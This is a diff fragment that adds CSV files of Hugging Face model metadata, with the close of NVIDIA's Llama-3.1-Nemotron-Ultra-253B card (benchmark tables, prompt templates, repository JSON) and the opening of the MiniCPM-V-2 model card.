| 258 |
+
| Reasoning On | 72.50 |
|
| 259 |
+
|
| 260 |
+
User Prompt Template:
|
| 261 |
+
|
| 262 |
+
```
|
| 263 |
+
""Below is a math question. I want you to reason through the steps and then give a final answer. Your final answer should be in \boxed{}.\nQuestion: {question}""
|
| 264 |
+
```
|
| 265 |
+
|
| 266 |
+
### BFCL V2 Live
|
| 267 |
+
|
| 268 |
+
| Reasoning Mode | Score |
|
| 269 |
+
|--------------|------------|
|
| 270 |
+
| Reasoning Off | 73.62 |
|
| 271 |
+
| Reasoning On | 74.10 |
|
| 272 |
+
|
| 273 |
+
User Prompt Template:
|
| 274 |
+
|
| 275 |
+
```
|
| 276 |
+
You are an expert in composing functions. You are given a question and a set of possible functions.
|
| 277 |
+
Based on the question, you will need to make one or more function/tool calls to achieve the purpose.
|
| 278 |
+
If none of the function can be used, point it out. If the given question lacks the parameters required by the function,
|
| 279 |
+
also point it out. You should only return the function call in tools call sections.
|
| 280 |
+
|
| 281 |
+
If you decide to invoke any of the function(s), you MUST put it in the format of <TOOLCALL>[func_name1(params_name1=params_value1, params_name2=params_value2...), func_name2(params)]</TOOLCALL>
|
| 282 |
+
|
| 283 |
+
You SHOULD NOT include any other text in the response.
|
| 284 |
+
Here is a list of functions in JSON format that you can invoke.
|
| 285 |
+
|
| 286 |
+
<AVAILABLE_TOOLS>{functions}</AVAILABLE_TOOLS>
|
| 287 |
+
|
| 288 |
+
{user_prompt}
|
| 289 |
+
```
|
| 290 |
+
|
| 291 |
+
### LiveCodeBench (20240801-20250201)
|
| 292 |
+
|
| 293 |
+
| Reasoning Mode | pass@1 |
|
| 294 |
+
|--------------|------------|
|
| 295 |
+
| Reasoning Off | 29.03 |
|
| 296 |
+
| Reasoning On | 66.31 |
|
| 297 |
+
|
| 298 |
+
User Prompt Template (without starter code):
|
| 299 |
+
|
| 300 |
+
````
|
| 301 |
+
""You will be given a question (problem specification) and will generate a correct Python program that matches the specification and passes all tests.
|
| 302 |
+
|
| 303 |
+
Question: {prompt}
|
| 304 |
+
|
| 305 |
+
Read the inputs from stdin solve the problem and write the answer to stdout (do not directly test on the sample inputs). Enclose your code within delimiters as follows. Ensure that when the python program runs, it reads the inputs, runs the algorithm and writes output to STDOUT.
|
| 306 |
+
```python
|
| 307 |
+
# YOUR CODE HERE
|
| 308 |
+
```
|
| 309 |
+
````
|
| 310 |
+
|
| 311 |
+
User Prompt Template (with starter code):
|
| 312 |
+
|
| 313 |
+
````
|
| 314 |
+
You will be given a question (problem specification) and will generate a correct Python program that matches the specification and passes all tests.
|
| 315 |
+
|
| 316 |
+
Question: {prompt}
|
| 317 |
+
|
| 318 |
+
You will use the following starter code to write the solution to the problem and enclose your code within delimiters.
|
| 319 |
+
```python
|
| 320 |
+
{starter_code}
|
| 321 |
+
```
|
| 322 |
+
````
|
| 323 |
+
|
| 324 |
+
### IFEval
|
| 325 |
+
|
| 326 |
+
| Reasoning Mode | Strict:Instruction |
|
| 327 |
+
|--------------|------------|
|
| 328 |
+
| Reasoning Off | 88.85 |
|
| 329 |
+
| Reasoning On | 89.45 |
|
| 330 |
+
|
| 331 |
+
### MATH500
|
| 332 |
+
|
| 333 |
+
| Reasoning Mode | pass@1 |
|
| 334 |
+
|--------------|------------|
|
| 335 |
+
| Reasoning Off | 80.40 |
|
| 336 |
+
| Reasoning On | 97.00 |
|
| 337 |
+
|
| 338 |
+
User Prompt Template:
|
| 339 |
+
|
| 340 |
+
```
|
| 341 |
+
""Below is a math question. I want you to reason through the steps and then give a final answer. Your final answer should be in \boxed{}.\nQuestion: {question}""
|
| 342 |
+
```
|
| 343 |
+
|
| 344 |
+
### JudgeBench
|
| 345 |
+
|
| 346 |
+
| Reasoning Mode | Knowledge Score | Reasoning Score | Math Score | Coding Score | Overall Score |
|
| 347 |
+
|--------------|------------|------------|------------|------------|------------|
|
| 348 |
+
| Reasoning On | 70.13 | 81.63 | 89.29 | 92.86 | 79.14 |
|
| 349 |
+
|
| 350 |
+
## Ethical Considerations:
|
| 351 |
+
|
| 352 |
+
NVIDIA believes Trustworthy AI is a shared responsibility and we have established policies and practices to enable development for a wide array of AI applications. When downloaded or used in accordance with our terms of service, developers should work with their internal model team to ensure this model meets requirements for the relevant industry and use case and addresses unforeseen product misuse.
|
| 353 |
+
|
| 354 |
+
For more detailed information on ethical considerations for this model, please see the Model Card++ [Explainability](./EXPLAINABILITY.md), [Bias](./BIAS.md), [Safety & Security](./SAFETY_and_SECURITY.md), and [Privacy](./PRIVACY.md) Subcards.
|
| 355 |
+
|
| 356 |
+
Please report security vulnerabilities or NVIDIA AI Concerns [here](https://www.nvidia.com/en-us/support/submit-security-vulnerability/).","{""id"": ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"", ""author"": ""nvidia"", ""sha"": ""fdb0e3ef93b51ddc9cd96a76e08a09e3f7f8ea3f"", ""last_modified"": ""2025-04-18 22:09:31+00:00"", ""created_at"": ""2025-04-07 18:47:10+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 20220, ""downloads_all_time"": null, ""likes"": 268, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": ""warm"", ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""nemotron-nas"", ""text-generation"", ""nvidia"", ""llama-3"", ""pytorch"", ""conversational"", ""custom_code"", ""en"", ""arxiv:2503.18908"", ""arxiv:2502.00203"", ""arxiv:2411.19146"", ""license:other"", ""autotrain_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlibrary_name: transformers\nlicense: other\nlicense_name: nvidia-open-model-license\nlicense_link: https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/\npipeline_tag: text-generation\ntags:\n- nvidia\n- llama-3\n- pytorch"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": null, ""config"": {""architectures"": [""DeciLMForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_decilm.DeciLMConfig"", ""AutoModelForCausalLM"": ""modeling_decilm.DeciLMForCausalLM""}, ""model_type"": ""nemotron-nas"", ""tokenizer_config"": {""bos_token"": ""<|begin_of_text|>"", ""chat_template"": ""{{- bos_token }}{%- if messages[0]['role'] == 'system' %}{%- set system_message = messages[0]['content']|trim %}{%- set messages = messages[1:] %}{%- else %}{%- set system_message = \""detailed thinking on\"" %}{%- endif %}{{- \""<|start_header_id|>system<|end_header_id|>\\n\\n\"" }}{{- system_message }}{{- \""<|eot_id|>\"" }}{%- for message in messages %}{%- if message['role'] == 'assistant' and '</think>' in message['content'] %}{%- set content = message['content'].split('</think>')[-1].lstrip() %}{%- else %}{%- set content = message['content'] %}{%- endif %}{{- '<|start_header_id|>' + message['role'] + '<|end_header_id|>\\n\\n' + content | trim + '<|eot_id|>' }}{%- endfor %}{%- if add_generation_prompt %}{{- '<|start_header_id|>assistant<|end_header_id|>\\n\\n' }}{%- endif %}"", ""eos_token"": ""<|eot_id|>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": ""modeling_decilm.DeciLMForCausalLM"", ""pipeline_tag"": ""text-generation"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='BIAS.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='EXPLAINABILITY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='PRIVACY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='SAFETY_and_SECURITY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='__init__.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='accuracy_plot.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='block_config.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_decilm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00012-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00013-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00014-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00015-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00016-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00017-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00018-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00019-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00020-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00021-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00022-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00023-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00024-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00025-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00026-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00027-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00028-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00029-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00030-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00031-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00032-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00033-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00034-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00035-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00036-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00037-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00038-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00039-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00040-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00041-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00042-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00043-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00044-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00045-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00046-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00047-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00048-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00049-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_decilm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='nemo_common.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='nemo_common.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='nemo_model_config.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_name.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_flowchart.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__activations.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__cache_utils.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__configuration_llama.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__modeling_attn_mask_utils.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__modeling_flash_attention_utils_backward_compat.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__modeling_outputs.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__modeling_rope_utils.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__pytorch_utils.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='variable_cache.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [""reflex-ai/nvidia-Llama-3_1-Nemotron-Ultra-253B-v1-demo"", ""caduh/nvidia-Llama-3_1-Nemotron-Ultra-253B-v1"", ""JishnuSetia/IntelliCounsel2.0"", ""JishnuSetia/EssayEase2.0"", ""JishnuSetia/JD-Matcher2.0"", ""Camargorock/Nemotron-Ultra""], ""safetensors"": {""parameters"": {""BF16"": 253401268224}, ""total"": 253401268224}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-18 22:09:31+00:00"", ""cardData"": ""language:\n- en\nlibrary_name: transformers\nlicense: other\nlicense_name: nvidia-open-model-license\nlicense_link: https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/\npipeline_tag: text-generation\ntags:\n- nvidia\n- llama-3\n- pytorch"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": ""modeling_decilm.DeciLMForCausalLM"", ""pipeline_tag"": ""text-generation"", ""processor"": null}, ""_id"": ""67f41dae290ea3246e6f9bcb"", ""modelId"": ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"", ""usedStorage"": 506829656144}",0,"https://huggingface.co/Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1, https://huggingface.co/limjh12/llama3.1_Test",2,,0,"https://huggingface.co/DevQuasar/nvidia.Llama-3_1-Nemotron-Ultra-253B-v1-GGUF, https://huggingface.co/nm-testing/Llama-3_1-Nemotron-Ultra-253B-v1-FP8-dynamic, https://huggingface.co/unsloth/Llama-3_1-Nemotron-Ultra-253B-v1-GGUF, https://huggingface.co/ArtusDev/nvidia_Llama-3_1-Nemotron-Ultra-253B-v1_EXL3_1.35bpw_H6, https://huggingface.co/Ithanil/Llama-3_1-Nemotron-Ultra-253B-v1-W8A8-Dynamic",5,,0,"Camargorock/Nemotron-Ultra, JishnuSetia/EssayEase2.0, JishnuSetia/IntelliCounsel2.0, JishnuSetia/JD-Matcher2.0, caduh/nvidia-Llama-3_1-Nemotron-Ultra-253B-v1, reflex-ai/nvidia-Llama-3_1-Nemotron-Ultra-253B-v1-demo",6
|
| 357 |
+
Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1,"---
|
| 358 |
+
license: other
|
| 359 |
+
license_name: nvidia-open-model-license
|
| 360 |
+
license_link: >-
|
| 361 |
+
https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/
|
| 362 |
+
base_model:
|
| 363 |
+
- nvidia/Llama-3_1-Nemotron-Ultra-253B-v1
|
| 364 |
+
tags:
|
| 365 |
+
- gguf-connector
|
| 366 |
+
---
|
| 367 |
+
|
| 368 |
+
Providing GGUFs for https://huggingface.co/nvidia/Llama-3_1-Nemotron-Ultra-253B-v1","{""id"": ""Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1"", ""author"": ""Joumdane"", ""sha"": ""10bf4bcaa70110689de7c22089da210df7e0bfe8"", ""last_modified"": ""2025-04-09 20:02:42+00:00"", ""created_at"": ""2025-04-09 20:00:49+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 1, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""gguf-connector"", ""base_model:nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"", ""base_model:finetune:nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"", ""license:other"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- nvidia/Llama-3_1-Nemotron-Ultra-253B-v1\nlicense: other\nlicense_name: nvidia-open-model-license\nlicense_link: https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/\ntags:\n- gguf-connector"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-09 20:02:42+00:00"", ""cardData"": ""base_model:\n- nvidia/Llama-3_1-Nemotron-Ultra-253B-v1\nlicense: other\nlicense_name: nvidia-open-model-license\nlicense_link: https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/\ntags:\n- gguf-connector"", ""transformersInfo"": null, ""_id"": ""67f6d1f16af266634d368c4b"", ""modelId"": ""Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BJoumdane%2FLlama-3_1-Nemotron-Ultra-253B-v1%5D(%2FJoumdane%2FLlama-3_1-Nemotron-Ultra-253B-v1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 369 |
+
https://huggingface.co/limjh12/llama3.1_Test,N/A,N/A,1,,0,,0,,0,,0,,0
|
Llama3-8B-Chinese-Chat_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
Llama3-8B-Chinese-Chat_finetunes_20250425_125929.csv_finetunes_20250425_125929.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
MiniCPM-V-2_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
@@ -0,0 +1,390 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
openbmb/MiniCPM-V-2,"---
|
| 3 |
+
pipeline_tag: visual-question-answering
|
| 4 |
+
language:
|
| 5 |
+
- en
|
| 6 |
+
- zh
|
| 7 |
+
datasets:
|
| 8 |
+
- HaoyeZhang/RLHF-V-Dataset
|
| 9 |
+
- Yirany/UniMM-Chat
|
| 10 |
+
- HuggingFaceM4/VQAv2
|
| 11 |
+
- liuhaotian/LLaVA-Instruct-150K
|
| 12 |
+
---
|
| 13 |
+
|
| 14 |
+
[GitHub](https://github.com/OpenBMB/MiniCPM-V) | [Demo](https://huggingface.co/spaces/openbmb/MiniCPM-V-2)
|
| 15 |
+
|
| 16 |
+
## News <!-- omit in toc -->
|
| 17 |
+
* [2025.01.14] 🔥 We open source [**MiniCPM-o 2.6**](https://huggingface.co/openbmb/MiniCPM-o-2_6), with significant performance improvement over **MiniCPM-V 2.6**, and support real-time speech-to-speech conversation and multimodal live streaming. Try it now.
|
| 18 |
+
* [2024.08.06] 🔥 We open-source [**MiniCPM-V 2.6**](https://huggingface.co/openbmb/MiniCPM-V-2_6), which outperforms GPT-4V on single image, multi-image and video understanding. It advances popular features of MiniCPM-Llama3-V 2.5, and can support real-time video understanding on iPad.
|
| 19 |
+
* [2024.05.20] 🔥 The GPT-4V level multimodal model [**MiniCPM-Llama3-V 2.5**](https://huggingface.co/openbmb/MiniCPM-Llama3-V-2_5) is out.
|
| 20 |
+
* [2024.04.23] MiniCPM-V 2.0 supports [vLLM](#vllm) now!
|
| 21 |
+
* [2024.04.18] We create a HuggingFace Space to host the demo of MiniCPM-V 2.0 at [here](https://huggingface.co/spaces/openbmb/MiniCPM-V-2)!
|
| 22 |
+
* [2024.04.17] MiniCPM-V 2.0 supports deploying [WebUI Demo](https://github.com/OpenBMB/MiniCPM-V/blob/8a1f766b85595a8095651eed9a44a83a965b305b/README_en.md#minicpm-v-) now!
|
| 23 |
+
* [2024.04.15] MiniCPM-V 2.0 supports [fine-tuning](https://github.com/modelscope/swift/blob/main/docs/source/Multi-Modal/minicpm-v-2最佳实践.md) with the SWIFT framework!
|
| 24 |
+
* [2024.04.12] We open-source MiniCPM-V-2.0, which achieves comparable performance with Gemini Pro in understanding scene text and outperforms strong Qwen-VL-Chat 9.6B and Yi-VL 34B on <a href=""https://rank.opencompass.org.cn/leaderboard-multimodal"">OpenCompass</a>, a comprehensive evaluation over 11 popular benchmarks. Click <a href=""https://openbmb.vercel.app/minicpm-v-2"">here</a> to view the MiniCPM-V 2.0 technical blog.
|
| 25 |
+
|
| 26 |
+
## MiniCPM-V 2.0
|
| 27 |
+
|
| 28 |
+
|
| 29 |
+
**MiniCPM-V 2.8B** is a strong multimodal large language model for efficient end-side deployment. The model is built based on SigLip-400M and [MiniCPM-2.4B](https://github.com/OpenBMB/MiniCPM/), connected by a perceiver resampler. Our latest version, **MiniCPM-V 2.0** has several notable features.
|
| 30 |
+
|
| 31 |
+
- 🔥 **State-of-the-art Performance.**
|
| 32 |
+
|
| 33 |
+
MiniCPM-V 2.0 achieves **state-of-the-art performance** on multiple benchmarks (including OCRBench, TextVQA, MME, MMB, MathVista, etc) among models under 7B parameters. It even **outperforms strong Qwen-VL-Chat 9.6B, CogVLM-Chat 17.4B, and Yi-VL 34B on OpenCompass, a comprehensive evaluation over 11 popular benchmarks**. Notably, MiniCPM-V 2.0 shows **strong OCR capability**, achieving **comparable performance to Gemini Pro in scene-text understanding**, and **state-of-the-art performance on OCRBench** among open-source models.
|
| 34 |
+
|
| 35 |
+
- 🏆 **Trustworthy Behavior.**
|
| 36 |
+
|
| 37 |
+
LMMs are known for suffering from hallucination, often generating text not factually grounded in images. MiniCPM-V 2.0 is **the first end-side LMM aligned via multimodal RLHF for trustworthy behavior** (using the recent [RLHF-V](https://rlhf-v.github.io/) [CVPR'24] series technique). This allows the model to **match GPT-4V in preventing hallucinations** on Object HalBench.
|
| 38 |
+
|
| 39 |
+
- 🌟 **High-Resolution Images at Any Aspect Raito.**
|
| 40 |
+
|
| 41 |
+
MiniCPM-V 2.0 can accept **1.8 million pixels (e.g., 1344x1344) images at any aspect ratio**. This enables better perception of fine-grained visual information such as small objects and optical characters, which is achieved via a recent technique from [LLaVA-UHD](https://arxiv.org/pdf/2403.11703.pdf).
|
| 42 |
+
|
| 43 |
+
- ⚡️ **High Efficiency.**
|
| 44 |
+
|
| 45 |
+
